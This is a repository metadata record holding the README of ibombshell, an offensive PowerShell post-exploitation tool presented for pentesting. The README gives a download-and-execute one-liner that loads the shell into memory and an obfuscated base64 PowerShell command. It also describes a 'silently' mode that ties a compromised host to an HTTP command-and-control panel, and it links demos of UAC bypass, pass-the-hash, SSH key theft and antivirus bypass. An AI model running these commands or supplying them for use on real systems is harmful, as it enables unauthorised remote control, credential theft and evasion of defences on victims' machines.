{"id":13454364,"url":"https://github.com/Telefonica/ibombshell","last_synced_at":"2025-03-24T05:33:40.998Z","repository":{"id":41433623,"uuid":"140594576","full_name":"Telefonica/ibombshell","owner":"Telefonica","description":"Tool to deploy a post-exploitation prompt at any time","archived":false,"fork":false,"pushed_at":"2021-05-28T09:57:26.000Z","size":2963,"stargazers_count":307,"open_issues_count":2,"forks_count":73,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-04-14T14:22:34.501Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Telefonica.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-07-11T15:25:41.000Z","updated_at":"2024-02-10T21:22:39.000Z","dependencies_parsed_at":"2022-08-25T06:22:44.299Z","dependency_job_id":null,"html_url":"https://github.com/Telefonica/ibombshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Telefonica","download_url":"https://codeload.github.com/Telefonica/ibombshell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245217428,"owners_count":20579291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:53.442Z","updated_at":"2025-03-24T05:33:40.954Z","avatar_url":"https://github.com/Telefonica.png","language":"Python","readme":"![Supported Python versions](https://img.shields.io/badge/python-3.6-blue.svg?style=flat-square)\n![License](https://img.shields.io/badge/license-GNU-green.svg?style=flat-square)\n\n# **ibombshell - Dynamic Remote Shell**\n\n```\n      ,--.!,    _ ____                  __   _____ __         ____\n   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /\n ,d08b.  '|`  / / __  / __ \\/ __ `__ \\/ __ \\\\__ \\/ __ \\/ _ \\/ / /\n 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /\n `9MMP'     /_/_____/\\____/_/ /_/ /_/_.___/____/_/ /_/\\___/_/_/\n\n [+] Starting the console...\n [*] Console ready!\n```\n\n**ibombshell** is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as _everywhere_.\n\nIn addition, _ibombshell_ provides a second execution mode called _Silently_, so the pentester can execute an instance of ibombshell (called _warrior_). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.\n\n# Prerequisities\n\nTo run _ibombshell everywhere_ it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the [PowerShell GitHub](https://github.com/PowerShell/PowerShell) - _PowerShell for every system!_.\n\nTo run the _ibombshell silently mode_ you need python 3.6 and some python libraries. You can install this with:\n\n```[python]\ncd ibombshell\\ c2/\npip install -r requirements.txt\n```\n\n**Note**: ibombshell C2 works in **python 3.X**. Make sure you run a pip relative to this version.\n\n# Usage\n\nibombshell has two execution modes:\n\n## ibombshell everywhere\n\nTo load ibombshell simply run on PowerShell:\n\n```[powershell]\niex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)\n```\n\nNow you can run the downloaded ibombshell console running:\n\n```[powershell]\nconsole\n```\n\n### ibombshell everywhere in isolated environments\n\nIf you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. Load all the functions you will need, and use savefunctions to save them in the Windows registry.\n\nNow you can use this base 64 code to get ibombshell:\n\n```[powershell]\npowershell.exe -E \"JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ\nBzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6\nADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG\n8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA\nYwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ\nB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv\nAHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A\"\n```\n\n## ibombshell silently mode\n\nThis version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:\n\n```[powershell]\niex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)\n```\n\nOn ibombshell C2 path, prepare the C2:\n\n```[python]\npython3 ibombshell.py\n```\n\nAnd create the listener where the warriors will connected:\n\n```[ibombshell]\niBombShell\u003e load modules/listener.py\n[+] Loading module...\n[+] Module loaded!\niBombShell[modules/listener.py]\u003e run\n```\n\nThe default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:\n\n```[powershell]\nconsole -Silently -uriConsole http://[ip or domain]:[port]\n```\n\n# ibombshell C2 scheme\n\nThe basic operation of the ibombshell control panel follows the following scheme:\n\n```[ascii]\n        ibombshell                 C2\n            |                      |\n            |    newibombshell     |\n            +---------------------\u003e| --+ register\n            |                      |\u003c--+ from IP\n            |    get functions     |\n            |   and instructions   |\n            +---------------------\u003e|\n            |                      |\n            |    send functions    |\n            |   and instructions   |\nexecute +-- |\u003c---------------------+\n        +--\u003e|                      |\n            |       results        |\n            +---------------------\u003e|\n            |                      |\n```\n\n# Docker\n\nWe have created a docker container with everything you need to make it works. Run this command from Dockerfile location.\n\n```[bash]\nsudo docker build -t \"ibombshell\" .\nsudo docker run -it ibombshell\n```\n\n# Example videos\n\nSome example videos...\n\n### _iBombShell: PoC Warrior + Bypass UAC + Pass the hash_\n\n[![iBombShell: PoC Warrior + Bypass UAC + Pass the hash](https://img.youtube.com/vi/v4c8MsOPTyA/0.jpg)](http://www.youtube.com/watch?v=v4c8MsOPTyA)\n\n### _iBombShell: macOS_\n\n[![iBombShell: PoC de uso desde macOS](https://img.youtube.com/vi/DQlWGPS1CB4/0.jpg)](http://www.youtube.com/watch?v=DQlWGPS1CB4)\n\n### _ibombshell: Extracting Private SSH Keys on Windows 10_\n\n[![ibombshell: Módulo para extracción de claves privadas SSH en Windows 10](https://img.youtube.com/vi/v7iXEg9cTNY/0.jpg)](http://www.youtube.com/watch?v=v7iXEg9cTNY)\n\n### _iBombShell: PoC savefunctions_\n\n[![iBombShell: PoC savefunctions](https://img.youtube.com/vi/QM0HufCYOEk/0.jpg)](https://www.youtube.com/watch?v=QM0HufCYOEk)\n\n### _ibombshell - Silently bypass UAC Environment Injection_\n\n[![ibombshell - Modo silencioso para el bypass UAC Environment Injection](https://img.youtube.com/vi/XrWM2gcXo3w/0.jpg)](https://www.youtube.com/watch?v=XrWM2gcXo3w)\n\n### _iBombShell - Mocking Trusted Directory_\n\n[![iBombShell - Mocking Trusted Directory](https://img.youtube.com/vi/6iCFS4FkedM/0.jpg)](https://www.youtube.com/watch?v=6iCFS4FkedM)\n\n### _iBombShell - DLL generation_\n\n[![iBombShell - DLL Generation](https://img.youtube.com/vi/I03klvk-DXo/0.jpg)](https://www.youtube.com/watch?v=I03klvk-DXo)\n\n### _iBombShell - AMSI \u0026 Windows Defender Bypass_\n\n[![iBombShell - AMSI \u0026 Windows Defender Bypass](https://img.youtube.com/vi/wCBLG3CfWMY/0.jpg)](https://www.youtube.com/watch?v=wCBLG3CfWMY)\n\n# License\n\nThis project is licensed under the GNU General Public License - see the LICENSE file for details\n\n# Contact\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.\n\nThis software doesn't have a QA Process. This software is a Proof of Concept.\n\nIf you have any problems, you can contact:\n\nideaslocas@telefonica.com\n\n","funding_links":[],"categories":["Tools","Python"],"sub_categories":["Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTelefonica%2Fibombshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTelefonica%2Fibombshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTelefonica%2Fibombshell/lists"}